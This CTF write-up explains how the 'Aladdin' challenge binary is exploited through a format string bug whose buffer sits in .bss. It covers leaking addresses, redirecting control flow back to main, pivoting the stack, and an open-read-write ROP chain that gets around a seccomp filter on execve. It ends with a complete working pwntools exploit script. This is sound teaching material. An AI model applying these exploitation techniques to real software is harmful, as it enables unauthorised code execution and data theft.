Pwn - Format String (BeginCTF - Aladdin)

# Pwn - Format String (BeginCTF - Aladdin) Write up for [BeginCTF - Aladdin](https://github.com/BraveCattle/ctf/tree/main/lactf/pizza) ## Overview ![aladdin](https://hackmd.io/_uploads/H1HpmC0ykl.png) ![seccomp](https://hackmd.io/_uploads/B1ryOA01ke.png) ![checksec](https://hackmd.io/_uploads/HJUZuA01Jx.png) ## Analysis At line 66, there is an unformatted print. Thus we can apply format string attack. There are 3 chances to use this format string. However, the format string `wish` is not on the stack. It is stored in `.bss` section. This makes the exploitation a bit more tricky, but still we can solve this by **Non-stack formatted string attack**. Checking the sandbox by `seccomp-tools dump ./aladdin_patched`, the `execve` is forbidden, therefore we use ORW (Open Read Write) to solve this problem here. The basic idea of this problem is to: 1. Get useful addresses (libc base address, elf base address, stack address) 2. Hijack the control flow, so that the program starts from `main` again after `main` returns. This will give us infinite number of format string attack chances 3. Forge the `rbp` of the main function to the address of `wish`, then we get a forged stack and can perform ROP on the forged stack ### Background on format string: Overwrite bytes with `%n` In format string, `printf("%k$p")` prints the k-th argument. And `printf("%n", ptr)` writes the number of characters printted to the address of pointer `ptr` (write 4 bytes). The working principle and more parameter introductions are at [ctf-wiki](https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/). Below is a simple example of leaking stack information and overwriting: ![图片](https://hackmd.io/_uploads/BkLL3Jge1x.png) ![图片](https://hackmd.io/_uploads/BkmrRJelkl.png) In this case, the pointer `p` is at the 7-th place. It is printed by `%7$p`. `printf("%6c")` prints 6 characters, therefore `6` will be written to the pointer `p`, which is the address of `arg1`, and the value of arg1 is overwritten to `6`. ### Leaking useful addresses Inspecting on the stack before executing `read`, we can find the libc, elf and stack related information: ![图片](https://hackmd.io/_uploads/SJGVxexgJg.png) The stack address lies in the 7-th argument, the libc address lies in the 15-th arugment and the elf address lies in the 17-th argument. By checking `vmmap` we can get the offsets: elf offset = 0x555555555229-0x555555554000 = 0x1229, libc offset = 0x7ffff7dbcd90-0x7ffff7d93000 = 0x29d90. ![图片](https://hackmd.io/_uploads/S1CLMlelJl.png) ```python r.sendafter(b"wish:\n", b'%15$p %17$p %7$p libc.address = int(r.recvuntil(b' ').decode(), 16) - 0x29d90 elf.address = int(r.recvuntil(b' ').decode(), 16) - 0x1229 stack_addr = int(r.recvuntil(b' ').decode(), 16) ``` ### Return back to `main` At `0x7ffff7dbcd8e`, `main` is called, and when `main` returns, the control flow goes back to `0x7ffff7dbcd90`. After `main` exits, its return value will be stored in `$rdi` and will call `exit`. To make the program start from `main` again, we only need to modify the value of `0x7fffffffd278` to `0x7ffff7dbcd89` ![图片](https://hackmd.io/_uploads/ryWQFxgx1g.png) To make hijack the control flow, we need to modify the 15-th argument (after `main` calls `leave ret`, the program will jump to `$rbp` and the value after `$rbp` will be used as next instruction). However, the format string is not on the stack. Here we need to modify the value of the 15-th argument by indirect means. To modify the value of 15-th argument, first we need a pointer that points to it, and then we can use `printf("%k$hhn")` to modify the last byte. Here we have `0x7fffffffd388` pointing to `0x7fffffffd64e`, therefore we can change the value of `0x7fffffffd388` by modifying `%19$n`. ![图片](https://hackmd.io/_uploads/rJBIilxlyl.png) ![图片](https://hackmd.io/_uploads/r1cRsxee1g.png) ```python r.sendafter(b"wish:\n", f"%{(stack_addr+0x38)&0xffff}c%19$hn".encode()) ``` Then, with the pointer pointing to the 15-th argument, we can modify it like we just did: ![图片](https://hackmd.io/_uploads/SJ7FTgee1l.png) ```python r.sendafter(b"wish:\n", f"%{0x89&0xff}c%49$hhn".encode()) ``` Then when `main` is executed the second time, the value of `chance` is already negative and thus we have infinite number of format string attacks now. ![图片](https://hackmd.io/_uploads/HJdM0xllJl.png) ### Forge the stack for ROP Now we have infinite number of format string attacks. However, performing ROP on the stack is cumbersome since we need to modify the stack byte by byte. A better way is to leverage the `wish` string, and pivot the stack to the address of `wish`, which is on the `.bss` section. Then every byte we input is exactly the constructed stack layout. To do this, we need to: 1. Overwrite the `$rbp` with the `wish` address. 2. Overwrite the next element of `$rbp` with `leave ret` By step 1 and 2, we pivots the stack to the address of `$rbp`, which subsequently stores our ROP payload. To overwrite values on the stack, again we can leverage the `0x7fffffffd298` and `0x7fffffffd388`, which is already the format of a chain. Each time we modify one byte of the `0x7fffffffd388`, which points to the address that we want to modify. Then use `0x7fffffffd388` to overwrite one byte of value. ```python def write_bytes(addr, value): for i in range(8): bt = (value>>(i*8))&0xff if bt == 0: continue r.sendafter(b"wish:\n", f"%{((addr)&0xff)+i}c%19$hhn".encode()) r.sendafter(b"wish:\n", f"%{bt}c%49$hhn".encode()) print(f"written byte: {hex(bt)} to address {hex(((addr)&0xff)+i)}") write_bytes(stack_addr+0x30, elf.sym['wish']+0x10) # pivot the stack to bss section write_bytes(stack_addr+0x38, leave_ret) ``` ![图片](https://hackmd.io/_uploads/SyUn7-lgyg.png) ### Using ORW to bypass sandbox checking restrictions With the stack pivoted, we can apply ROP payload to attack. However, the ELF is applied with sandbox check, which means that we cannot use `system('/bin/sh')` to call get the shell. ``` $ seccomp-tools dump ./aladdin_patched line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000000 A = sys_number 0001: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0003 0002: 0x35 0x01 0x00 0x00000000 if (A >= 0x0) goto 0004 0003: 0x06 0x00 0x00 0x00050000 return ERRNO(0) 0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW ``` Still, since we only need to read the flag, we can use Open Read Write system calls to obtain the flag. The arguments of open, read, and write are shown in the below table: | Function prototype | Argument 1 | Argument 2 | Argument 3 | | -------- | -------- | -------- | -------- | | open(file, oflag) | filename | open type (`0` for read only) | N/A | read(fd, buf, n_bytes) | file descriptor | buffer to store the read contents | number of bytes to read | | write(fd, buf, n_bytes) | file descriptor | buffer to load the write contents | number of bytes to write | For the file descriptors: * `0` stands for standard input (`stdin`, from keyboard) * `1` stands for standard output (`stdout`, on screen) * `2` stands for standard error (`stderr`) * `3 and after` stands for files. Starts from 3, increases as the opened files increases. To call ORW, we need to set the following registers: | Function | rax | rdi | rsi | rdx | | ----- | ----- | ----- | ----- | ----- | | open | 2 | address of the filename | N/A | N/A | | read | 0 | 3 (fd, assuming 3 as first opened file) | buffer address | number of bytes to read | | write | 1 | 1 (stdout) | buffer address | number of bytes to write | Pwntools provide a system call api for eaiser calling of ORW system calls. See more examples at [pwnlib doc](https://docs.pwntools.com/en/stable/rop/rop.html#rop-example). With libc gadgets, we can directly use pwnlib ROP tool to construct the ROP chain (**need to set libc.address**). ```python rop = ROP(libc) rop.call("open", [elf.sym['wish']+0x10, 0]) rop.call("read", [3, elf.sym['wish']+0x10, 0x100]) rop.call("write", [1, elf.sym['wish']+0x10, 0x100]) payload = b'one more wish'.ljust(0x10, b'\x00')+b'flag'.ljust(0x8, b'\x00') payload += rop.chain() ``` ### Source Code ```python= from pwn import * context.log_level = 'debug' context.arch = 'amd64' r = process("./aladdin_patched") libc = ELF("./libc.so.6") elf = ELF("./aladdin_patched") r.sendafter(b"wish:\n", b'%15$p %17$p %7$p ') libc.address = int(r.recvuntil(b' ').decode(), 16) - 0x29d90 elf.address = int(r.recvuntil(b' ').decode(), 16) - 0x1229 stack_addr = int(r.recvuntil(b' ').decode(), 16) print(f"libc addr: {hex(libc.address)}") print(f"elf addr: {hex(elf.address)}") print(f"stack addr: {hex(stack_addr)}") # gdb.attach(r, "b *main+0x1393-0x1229\nb main+508-0x1229") pause() # b *(main+429) r.sendafter(b"wish:\n", f"%{(stack_addr+0x38)&0xffff}c%19$hn".encode()) r.sendafter(b"wish:\n", f"%{0x89&0xff}c%49$hhn".encode()) leave_ret = elf.address + 0x1425 pop_rdi = libc.address + 0x2a3e5 # pop rdi ; ret pop_rsi = libc.address + 0x2be51 # pop rsi ; ret pop_rdx = libc.address + 0x796a2 # pop rdx ; ret pop_rax = libc.address + 0x45eb0 # pop rax ; ret syscall = libc.address + 0x29db4 def write_bytes(addr, value): for i in range(8): bt = (value>>(i*8))&0xff if bt == 0: continue r.sendafter(b"wish:\n", f"%{((addr)&0xff)+i}c%19$hhn".encode()) r.sendafter(b"wish:\n", f"%{bt}c%49$hhn".encode()) print(f"written byte: {hex(bt)} to address {hex(((addr)&0xff)+i)}") write_bytes(stack_addr+0x30, elf.sym['wish']+0x10) # pivot the stack to bss section write_bytes(stack_addr+0x38, leave_ret) rop = ROP(libc) rop.call("open", [elf.sym['wish']+0x10, 0]) rop.call("read", [3, elf.sym['wish']+0x10, 0x100]) rop.call("write", [1, elf.sym['wish']+0x10, 0x100]) payload = b'one more wish'.ljust(0x10, b'\x00')+b'flag'.ljust(0x8, b'\x00') payload += rop.chain() print(f"payload: {payload}") r.sendafter(b"wish:\n", payload) r.interactive() ```